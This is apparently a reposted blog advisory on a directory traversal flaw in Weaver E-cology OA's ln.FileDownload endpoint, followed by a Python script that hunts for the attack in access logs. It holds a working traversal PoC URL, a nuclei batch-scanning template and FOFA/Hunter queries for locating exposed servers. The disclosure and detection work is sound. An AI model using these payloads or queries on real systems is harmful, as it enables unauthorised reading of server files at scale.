
Weaver (泛微) E-cology filedownload Directory Traversal Vulnerability

Published: 2023-09-04 15:45:00
Tags: ecology, filedownload, OA, vulnerability, cology, Weaver

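Vulnerability Description

The filedownload file in Weaver E-cology has a directory traversal vulnerability.

Vulnerability Reproduction

FOFA query syntax: app="泛微-协同办公OA"
Hunter query syntax: app.name="泛微 e-cology 9.0 OA"
The login page looks like this: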

POC:/weaver/ln.FileDownload?fpath=../ecology/WEB-INF/web.xml

nuclei YAML template for batch checking

id: ecology-filedownload-directory-traversal

info:
  name: Ecology - Local File Inclusion
  author: princechaddha
  severity: high
  description: Ecology is vulnerable to local file inclusion.
  metadata:
    max-request: 1
    fofa-query: app="泛微-协同办公OA"
  classification:
    cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
    cvss-score: 7.5
    cwe-id: CWE-22
  tags: ecology,lfi

http:
  - method: GET
    path:
      - "{{BaseURL}}/weaver/ln.FileDownload?fpath=../ecology/WEB-INF/web.xml"
    matchers-condition: and
    matchers:
      - type: status
        status:
          - 200
      - type: word
        words:
          - "<url-pattern>/weaver/"
        part: body
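
For defenders, the same request pattern can be hunted in web access logs. The following is an added example, not part of the original post or of any Weaver tooling: it flags requests to the FileDownload endpoint whose fpath parameter, after decoding, contains a parent-directory segment or references WEB-INF. The combined log format, the function names and the sample log lines are assumptions made for illustration.

```python
import re
from urllib.parse import urlsplit, parse_qs, unquote

# Endpoint and parameter taken from the PoC on this page (compared case-insensitively, an assumption).
ENDPOINT = "/weaver/ln.filedownload"
PARAM = "fpath"
# Request field of a combined-format access log line: "METHOD target HTTP/x.y" status
REQUEST_RE = re.compile(r'"(?P<method>[A-Z]+) (?P<target>\S+) HTTP/[\d.]+" (?P<status>\d{3})')

def fully_decode(value, max_rounds=3):
    """Undo repeated percent-encoding, up to max_rounds passes."""
    for _ in range(max_rounds):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return value

def is_traversal(path_value):
    """True if the decoded value has a '..' path segment or mentions WEB-INF."""
    normalized = fully_decode(path_value).replace("\\", "/")
    return ".." in normalized.split("/") or "web-inf" in normalized.lower()

def scan(lines):
    """Return (line_number, status, decoded_fpath) for suspicious FileDownload requests."""
    hits = []
    for lineno, line in enumerate(lines, 1):
        m = REQUEST_RE.search(line)
        if not m:
            continue
        url = urlsplit(m.group("target"))
        if fully_decode(url.path).lower() != ENDPOINT:
            continue
        for value in parse_qs(url.query, keep_blank_values=True).get(PARAM, []):
            if is_traversal(value):
                hits.append((lineno, int(m.group("status")), fully_decode(value)))
    return hits

# Constructed sample log lines (documentation IP ranges, not from a real system).
SAMPLE_LOG = [
    '203.0.113.7 - - [04/Sep/2023:15:40:01 +0800] "GET /weaver/ln.FileDownload?fpath=../ecology/WEB-INF/web.xml HTTP/1.1" 200 5120',
    '203.0.113.7 - - [04/Sep/2023:15:40:05 +0800] "GET /weaver/ln.FileDownload?fpath=..%2Fecology%2FWEB-INF%2Fweb.xml HTTP/1.1" 404 0',
    '198.51.100.9 - - [04/Sep/2023:15:41:10 +0800] "GET /weaver/ln.FileDownload?fpath=report.pdf HTTP/1.1" 200 20480',
    '198.51.100.9 - - [04/Sep/2023:15:41:12 +0800] "GET /login/Login.jsp HTTP/1.1" 200 900',
]

if __name__ == "__main__":
    for hit in scan(SAMPLE_LOG):
        print(hit)
```

A hit with status 200 deserves priority review, since it means the server returned content for a path outside the intended download directory.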

From: https://www.cnblogs.com/pursue-security/p/17677229.html
